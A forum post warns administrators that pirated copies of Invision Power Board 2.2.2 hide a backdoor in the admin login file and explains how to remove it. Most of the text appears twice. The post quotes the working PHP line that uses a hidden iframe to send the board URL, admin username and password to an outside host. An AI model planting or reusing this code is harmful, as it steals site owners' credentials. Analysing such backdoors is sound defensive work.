DarkDragonLord
New Member
- Messages
- 782
- Reaction score
- 0
- Points
- 0
Greetings everyone!
Well, just to let you know. This warning is for everyone but more for those who think is smarter than everyone, not buying the license but just downloading IPB in internet.
But, this can warn other people too.
When you go to www.randomdomainhere.com/forums/admin.php , it send you to forums/admin/index.php right? ok nothing new until here:
When you put your login and password and hit ok, it loads and appear a "Log In Successful".
Ok, but did you noticed that you might be giving your user/pass to anyone? You might ask "how? anyways, its MY forum".
Ya but someone added a code in the php of the admin login xD look this:
http://img251.imageshack.us/img251/5633/suspeito2tw7.jpg
So, when you login, first it give all your info for these bastards, THEN you log in.
I've checked all damn php related to admin of IPB and founded the string. Its inside <forumfolder>/sources/action_admin/login.php
Then, find the array $connector. If you find, take a look and you will see the string giving all your info to the website.
you might find as this:
Delete all that is related to $connector (all until the div>'; , since the $this in the next line just redirects you to the real admin cp), save and re-upload.
Now when you login, you will notice that your info isnt gave to anyone anymore.
If you check the website that is receiving the info, its offline. But, this is a service LIKE no-ip, so watch yourself.
I founded this while installing and testing a non-official IPB 2.2.2 for my friend since he can't pay the license >.<
Well, that was just a warning to u people: watch yourself and your info. This can be done anywhere in any non-official forum.
Hope this help someone ;D
See you
DDL
Well, just to let you know. This warning is for everyone but more for those who think is smarter than everyone, not buying the license but just downloading IPB in internet.
But, this can warn other people too.
When you go to www.randomdomainhere.com/forums/admin.php , it send you to forums/admin/index.php right? ok nothing new until here:
When you put your login and password and hit ok, it loads and appear a "Log In Successful".
Ok, but did you noticed that you might be giving your user/pass to anyone? You might ask "how? anyways, its MY forum".
Ya but someone added a code in the php of the admin login xD look this:
http://img251.imageshack.us/img251/5633/suspeito2tw7.jpg
So, when you login, first it give all your info for these bastards, THEN you log in.
I've checked all damn php related to admin of IPB and founded the string. Its inside <forumfolder>/sources/action_admin/login.php
Then, find the array $connector. If you find, take a look and you will see the string giving all your info to the website.
you might find as this:
PHP:
$connector = '<script>window.stuats=\'\';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';
$this->ipsclass->admin->redirect( $this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?ad
(....)Delete all that is related to $connector (all until the div>'; , since the $this in the next line just redirects you to the real admin cp), save and re-upload.
Now when you login, you will notice that your info isnt gave to anyone anymore.
If you check the website that is receiving the info, its offline. But, this is a service LIKE no-ip, so watch yourself.
I founded this while installing and testing a non-official IPB 2.2.2 for my friend since he can't pay the license >.<
Well, that was just a warning to u people: watch yourself and your info. This can be done anywhere in any non-official forum.
Hope this help someone ;D
See you
DDL
Last edited:
